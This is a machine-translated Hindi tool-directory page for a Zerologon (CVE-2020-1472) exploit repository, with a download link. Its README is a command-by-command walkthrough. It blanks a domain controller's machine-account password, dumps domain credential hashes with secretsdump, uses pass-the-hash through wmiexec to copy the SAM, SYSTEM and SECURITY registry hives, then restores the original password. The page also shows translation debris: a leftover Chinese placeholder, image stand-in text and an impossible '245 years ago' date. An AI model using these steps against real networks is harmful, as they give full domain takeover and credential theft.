Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2020-1472 — CVE-2020-1472 (Zerologon) के लिए शोषण जो डोमेन कंट्रोलर मशीन खाता पासवर्ड रीसेट करता है, क्रेडेंशियल डंपिंग और डोमेन व्यवस्थापक के लिए विशेषाधिकार वृद्धि सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/shanfenglan/cve-2020-1472
विशेषाधिकार वृद्धिपासवर्ड हमलेभेद्यता विश्लेषणशोषणपार्श्व आंदोलनपेनिट्रेशन टेस्टिंग
GitHubshanfenglan/cve-2020-1472

cve-2020-1472

CVE-2020-1472 (Zerologon) के लिए शोषण जो डोमेन कंट्रोलर मशीन खाता पासवर्ड रीसेट करता है, क्रेडेंशियल डंपिंग और डोमेन व्यवस्थापक के लिए विशेषाधिकार वृद्धि सक्षम करता है।

रिपॉजिटरी देखें
245 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

cve-2020-1472

@toc

भेद्यता का सिद्धांत

सिद्धांत काफी जटिल है, रुचि होने पर नीचे दिए गए लिंक पर लेख देख सकते हैं: https://www.freebuf.com/articles/system/249860.html

शोषण

1. फ़ाइल impacket.dcerpc.v5.nrpc संशोधित करें

स्थानीय मशीन पर nrpc फ़ाइल को बदलने के लिए https://github.com/SecureAuthCorp/impacket/edit/master/impacket/dcerpc/v5/nrpc.py फ़ाइल का उपयोग करना आवश्यक है। स्थानीय nrpc फ़ाइल का संग्रहण पथ है: C:\Users\Administrator\AppData\Local\Programs\Python\Python38\Lib\site-packages\impacket\dcerpc\v5\nrpc.py

2. मशीन खाते yukong$ का पासवर्ड खाली करें

python cve-2020-1472-exploit.py 机器账户名 ip यहाँ चित्र विवरण डालें और यह पाया गया कि मशीन खाते का पासवर्ड पहले ही खाली कर दिया गया है, 31dc... खाली पासवर्ड दर्शाता है। यहाँ चित्र विवरण डालें

दूसरे पक्ष का मशीन खाता या netbios नाम प्राप्त करने के तरीके:

  1. net view यहाँ चित्र विवरण डालें इस सर्वर नाम में $ जोड़ने पर यह मशीन नाम बन जाता है, उदाहरण के लिए lisi$ या yukong$।
  1. nbtstat -A ip यहाँ चित्र विवरण डालें डोमेन कंट्रोलर का IP निर्धारित करने की कई विधियाँ हैं, उदाहरण के लिए:
  2. पोर्ट 53 खुला रखने वाले होस्ट को देखें
  3. net time के आउटपुट से डोमेन कंट्रोलर का होस्टनाम मिलेगा, फिर ping करें
  4. systeminfo कमांड से डोमेन वाले भाग का मान देखें, ping करते ही डोमेन कंट्रोलर का IP मिल जाएगा
  5. अपने होस्ट का DNS देखें

3. administrator पासवर्ड पढ़ें

python secretsdump.py test.com/[email protected] -no-pass यहाँ चित्र विवरण डालें यह पाया गया कि इस समय खाली पासवर्ड वाले मशीन खाते का उपयोग करके डोमेन कंट्रोलर पर मौजूद उपयोगकर्ता हैश पढ़े जा सकते हैं।

4. अगले चरण में मशीन पासवर्ड पुनर्स्थापित करने की तैयारी के लिए लक्ष्य की sam फ़ाइल डाउनलोड करें

python wmiexec.py -hashes :3dbde697d71690a769204beb12283678 test/[email protected] reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save reg save HKLM\SECURITY security.save

get system.save get sam.save get security.save

del /f system.save del /f sam.save del /f security.save

exit

यहाँ चित्र विवरण डालें निष्पादन पूरा होने के बाद wmiexec स्क्रिप्ट वाले फ़ोल्डर में डाउनलोड की गई फ़ाइलें मिल सकती हैं: यहाँ चित्र विवरण डालें

python secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 test.com/[email protected] -use-vss यह कमांड निष्पादित होने में विफल रहा

5. पुराना मशीन पासवर्ड देखने के लिए sam फ़ाइल को क्रैक करें

python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL यहाँ चित्र विवरण डालें लाल घेरे में दिख रहे पासवर्ड को सहेजें, यही पुराना मशीन पासवर्ड है, अर्थात aad3b435b51404eeaad3b435b51404ee:999699ceadecae87fef9a2040ef2213a।

6. yukong$ मशीन पासवर्ड रीसेट करें

python reinstall_original_pw.py yukong$ 192.168.124.142 999699ceadecae87fef9a2040ef2213a यहाँ चित्र विवरण डालें

7. जाँचें कि पासवर्ड सफलतापूर्वक पुनर्स्थापित हुआ या नहीं

python secretsdump.py test.com/administrator:[email protected] -just-dc-user yukong$ python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678 test/[email protected] -just-dc-user yukong$ यहाँ चित्र विवरण डालें पुनर्स्थापना सफल पाई गई।

टूल डाउनलोड करें